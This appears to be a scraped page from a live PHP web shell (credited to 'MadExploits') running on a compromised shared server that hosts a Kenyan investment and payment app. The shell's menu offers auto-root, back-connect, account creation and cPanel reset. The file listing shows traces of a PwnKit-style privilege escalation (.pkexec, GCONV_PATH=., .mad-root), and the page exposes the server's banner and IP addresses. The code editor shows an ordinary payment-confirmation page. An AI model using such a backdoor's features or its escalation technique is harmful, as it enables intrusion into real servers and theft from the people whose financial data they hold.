Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.146
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
app.tradesense.co.ke /
app /
Views /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
-Money market fund.html
605
B
-rw-r--r--
-withdraw in its box
92
B
-rw-r--r--
app-blog.html
6.88
KB
-rw-r--r--
cellulant.php
16.74
KB
-rw-r--r--
changepassword.php
5.45
KB
-rw-r--r--
completeprofile.php
11.29
KB
-rw-r--r--
component-alert.html
9.68
KB
-rw-r--r--
confirmationfail.php
7.41
KB
-rw-r--r--
deposit.php
4.77
KB
-rw-r--r--
eftconfirmation.php
6.71
KB
-rw-r--r--
eftstatus.php
6.7
KB
-rw-r--r--
eftwithdraw.php
13.09
KB
-rw-r--r--
enrolsuccess.php
6.97
KB
-rw-r--r--
forgotemail.php
5.17
KB
-rw-r--r--
forgotpassword.php
4.97
KB
-rw-r--r--
fundinfo.php
45.37
KB
-rw-r--r--
fundreports.php
5.79
KB
-rw-r--r--
funds.php
5.79
KB
-rw-r--r--
index.php
38.21
KB
-rw-r--r--
ipay.php
16.57
KB
-rw-r--r--
ipayconfirmation.php
9.53
KB
-rw-r--r--
ipaysuccess.php
8.52
KB
-rw-r--r--
ipaywithdraw.php
12.38
KB
-rw-r--r--
ipaywithdrawconfirmation.php
8.22
KB
-rw-r--r--
login.php
7.43
KB
-rw-r--r--
mpesa.php
6.48
KB
-rw-r--r--
nav.php
8.99
KB
-rw-r--r--
notification.php
6.22
KB
-rw-r--r--
notificationdetail.php
4.8
KB
-rw-r--r--
onboard.php
3.51
KB
-rw-r--r--
paymentconfirmation.php
9.95
KB
-rw-r--r--
paymentsuccess.php
8.93
KB
-rw-r--r--
pensionfund.php
6.84
KB
-rw-r--r--
profile.php
7.66
KB
-rw-r--r--
register.php
8.35
KB
-rw-r--r--
specialfund.php
8.63
KB
-rw-r--r--
stkpushfailed.php
7.04
KB
-rw-r--r--
topupmethod.php
4.85
KB
-rw-r--r--
transaction-detail.php
4.61
KB
-rw-r--r--
transactions.php
5.07
KB
-rw-r--r--
unitfund.php
9.56
KB
-rw-r--r--
updateemail.php
5.1
KB
-rw-r--r--
updatepassword.php
5.25
KB
-rw-r--r--
updatephone.php
5.49
KB
-rw-r--r--
updatephoto.php
4.91
KB
-rw-r--r--
updateprofile.php
7.48
KB
-rw-r--r--
verify.php
4.27
KB
-rw-r--r--
verifyemail.php
3.82
KB
-rw-r--r--
verifypassword.php
3.81
KB
-rw-r--r--
verifyphone.php
4.27
KB
-rw-r--r--
wealthfund.php
9.09
KB
-rw-r--r--
welcome_message.php
17.39
KB
-rw-r--r--
withdrawmethod.php
6.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ipaysuccess.php
<!doctype html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover" /> <meta name="apple-mobile-web-app-capable" content="yes" /> <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"> <meta name="theme-color" content="#000000"> <title>Amana Capital</title> <link rel="icon" type="image/png" href="fav.png" sizes="32x32"> <link rel="icon" type="image/png" href="fav.png" sizes="32x32"> <link rel="apple-touch-icon" sizes="180x180" href="assets/img/icon/192x192.png"> <link rel="stylesheet" href="assets/css/style.css"> <link rel="manifest" href="__manifest.json"> <link href='https://fonts.googleapis.com/css?family=Lexend Deca' rel='stylesheet'> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> </head> <body> <style> body { font-family: 'Lexend Deca'; background-image: url('vecteezy_abstract-green-and-blue-fluid-wave-background_11787776.jpg'); background-repeat: no-repeat; background-attachment: fixed; background-position: right;} </style> <!-- App Header --> <div class="appHeader text-black"> <div class="left"> <a href="#" class="headerButton" data-bs-toggle="modal" data-bs-target="#sidebarPanel"> <ion-icon name="menu-outline"></ion-icon> </a> </div> <img src="logo.png" alt="logo" width="200" class="logo"> <?php if ($number_of_new_offers->total > 0) { // code... ?> <div class="right"> <a href="notification" class="headerButton"> <ion-icon class="icon" name="notifications-outline"></ion-icon> <span class="badge badge-danger"><?php echo $number_of_new_offers->total;?></span> </a> </div> <?php } elseif ($number_of_new_offers->total == 0) { // code... ?> <div class="right"> <a href="notification" class="headerButton"> <ion-icon class="icon" name="notifications-outline"></ion-icon> </a> </div><?php }?> </div> <!-- * App Header --> <!-- App Capsule --> <div id="appCapsule"> <!-- Slider --> <div class="section mt-4"> <div class="card card-with-icon"> <div class="splash-page mt-5 mb-5"> <div class="transfer-verification"> <div class="transfer-amount"> <span class="caption">Amount</span> <h2>Ksh <?php echo $amount;?> </h2> </div> <div class="from-to-block mb-5"> <div class="item text-start"> <img src="assets/img/sample/avatar/avatar1.jpg" alt="avatar" class="imaged w48"> <strong> <?php echo $fullnam;?> </strong> </div> <div class="item text-end"> <img src="assets/img/sample/avatar/avatar4.jpg" alt="avatar" class="imaged w48"> <strong> <?php $fundiid= $fundid; if ($fundiid == 1) {?>World Global Fund <?php }elseif ($fundiid == 2) {?>Money Market Fund<?php // code... }elseif ($fundiid == 3) {?>Pension Fund<?php // code... }?> </strong> </div> <div class="arrow"></div> </div> </div> <h2 class="mb-2 mt-2">Verify the Transaction</h2> <p> You are sending <strong class="text-primary">Ksh <?php echo $amount;?> </strong> to <?php $fundiid= $fundid; if ($fundiid == 1) {?>World Global Fund <?php }elseif ($fundiid == 2) {?>Money Market Fund<?php // code... }elseif ($fundiid == 3) {?>Pension Fund<?php // code... }?> <br> </p> </div> <div class="card-body pt-3 pb-3 text-center"> <div class="card-icon mb-2 bg-success"> <ion-icon name="chatbox-ellipses"></ion-icon> </div> <h3 class="card-titlde mb-1">Payment Received </h3> <p>Hi Thank you for Making a deposit !</p> <br></br> <br></br> <div class="row mt-8"> <div class="col"> <a href="index" class="btn btn-block btn-primary"> Homepage </a> </div> </div> </div> </div> </div> </div> <!-- * App Capsule --> <!-- ========= JS Files ========= --> <!-- Bootstrap --> <script src="assets/js/lib/bootstrap.bundle.min.js"></script> <!-- Ionicons --> <script type="module" src="https://unpkg.com/ionicons@5.5.2/dist/ionicons/ionicons.js"></script> <!-- Splide --> <script src="assets/js/plugins/splide/splide.min.js"></script> <!-- Apex Charts --> <script src="assets/js/plugins/apexcharts/apexcharts.min.js"></script> <!-- Base Js File --> <script src="assets/js/base.js"></script> <script> var sparklineAreaExampleSuccess1 = { series: [{ data: [555, 1222, 777, 888, 555, 888, 999, 1222] }], chart: { type: 'area', width: '100%', height: 70, sparkline: { enabled: true } }, stroke: { width: 2, }, colors: ['#1DCC70'], tooltip: { enabled: false } }; var sparklineAreaExampleSuccess2 = { series: [{ data: [55, 66, 55, 77, 66, 180, 290, 333] }], chart: { type: 'area', width: '100%', height: 70, sparkline: { enabled: true } }, stroke: { width: 2, }, colors: ['#1DCC70'], tooltip: { enabled: false } }; var sparklineAreaExampleDanger1 = { series: [{ data: [2222, 1666, 1444, 1777, 1333, 1111, 777, 666] }], chart: { type: 'area', width: '100%', height: 70, sparkline: { enabled: true } }, stroke: { width: 2, }, colors: ['#FF396F'], tooltip: { enabled: false } }; var sparklineAreaExampleDanger2 = { series: [{ data: [1200, 1444, 2900, 505, 531, 1900, 555, 75] }], chart: { type: 'area', width: '100%', height: 70, sparkline: { enabled: true } }, stroke: { width: 2, }, colors: ['#FF396F'], tooltip: { enabled: false } }; document.addEventListener('DOMContentLoaded', function () { document.querySelectorAll('.chart-sparkline-success-1').forEach(chart => new ApexCharts(chart, sparklineAreaExampleSuccess1).render()); document.querySelectorAll('.chart-sparkline-success-2').forEach(chart => new ApexCharts(chart, sparklineAreaExampleSuccess2).render()); document.querySelectorAll('.chart-sparkline-danger-1').forEach(chart => new ApexCharts(chart, sparklineAreaExampleDanger1).render()); document.querySelectorAll('.chart-sparkline-danger-2').forEach(chart => new ApexCharts(chart, sparklineAreaExampleDanger2).render()); }) </script> </body> </html>
Close